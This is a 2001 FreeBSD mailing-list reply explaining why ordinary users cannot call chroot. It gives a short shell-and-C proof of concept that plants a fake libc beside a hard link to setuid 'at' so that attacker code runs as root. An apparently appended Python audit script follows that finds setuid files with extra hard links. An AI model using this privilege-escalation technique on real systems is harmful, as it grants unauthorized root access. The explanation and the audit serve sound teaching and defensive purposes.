Date:      Mon, 8 Oct 2001 13:23:20 +0100
From:      Mike Bristow <mike@urgle.com>
To:        Thierry Black <thierryblack@hotmail.com>
Cc:        freebsd-hackers@freebsd.org
Subject:   Re: chroot
Message-ID:  <20011008132320.B52388@lindt.urgle.com>
In-Reply-To: <F5avN3qljWwY0VnkB4l000048bc@hotmail.com>; from thierryblack@hotmail.com on Thu, Oct 04, 2001 at 05:32:16PM -0600
References:  <F5avN3qljWwY0VnkB4l000048bc@hotmail.com>

On Thu, Oct 04, 2001 at 05:32:16PM -0600, Thierry Black wrote:
[ please don't write in HTML. Do it again and I'll drop you in a kill file.]

However, to answer the question "why don't we allow users to chroot", I 
present you with:

$ mkdir -p hack/usr/lib
$ mkdir -p hack/usr/bin
$ cp evilness.so hack/usr/lib/libc.so
$ ln /usr/bin/at hack/usr/bin
$ cat hack-a-tack.c
#include <unistd.h>
int main (void) { chroot("hack"); execl("/usr/bin/at", "/usr/bin/at", (char *)NULL); return 1; }
$ gcc -o hack-a-tack hack-a-tack.c
$ ./hack-a-tack

Now, code I wrote is running with root privileges.  While it's 
clearly running in a chrooted environment, you can still do
Very Bad Things.

(This, of course, assumes that you have write permissions somewhere
on the same file system as a suid program.  This is probably true
on many systems.)

-- 
Mike Bristow, seebitwopie  
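
The precondition stated in the message is a hard link to a set-id program from a directory the user can write to, on the same file system. As an added example (not part of the original message), this Python audit lists setuid/setgid regular files that have more than one hard link, grouped by inode; the names find_linked_setid and _dev are hypothetical.

```python
import os
import stat
import sys
from collections import defaultdict

SETID = stat.S_ISUID | stat.S_ISGID


def _dev(path):
    try:
        return os.lstat(path).st_dev
    except OSError:
        return None


def find_linked_setid(root):
    """Map (st_dev, st_ino) -> (st_nlink, [paths]) for setuid/setgid regular
    files under root that have more than one hard link."""
    root_dev = _dev(root)
    paths, nlink = defaultdict(list), {}
    for dirpath, dirnames, filenames in os.walk(root):
        # Hard links cannot cross file systems, so stay on root's device.
        dirnames[:] = [d for d in dirnames
                       if _dev(os.path.join(dirpath, d)) == root_dev]
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # vanished or unreadable
            if (stat.S_ISREG(st.st_mode) and st.st_mode & SETID
                    and st.st_nlink > 1):
                key = (st.st_dev, st.st_ino)
                paths[key].append(full)
                nlink[key] = st.st_nlink
    return {k: (nlink[k], sorted(v)) for k, v in paths.items()}


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for (dev, ino), (links, found) in sorted(find_linked_setid(root).items()):
        print(f"dev={dev} inode={ino} links={links}")
        for p in found:
            print(f"  {p}")
        if links > len(found):
            # Remaining names are outside the scanned tree or unreadable.
            print(f"  ({links - len(found)} link(s) not found under {root})")
```

Run it once per mounted file system; a set-id inode with a name outside the system binary directories is worth investigating.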
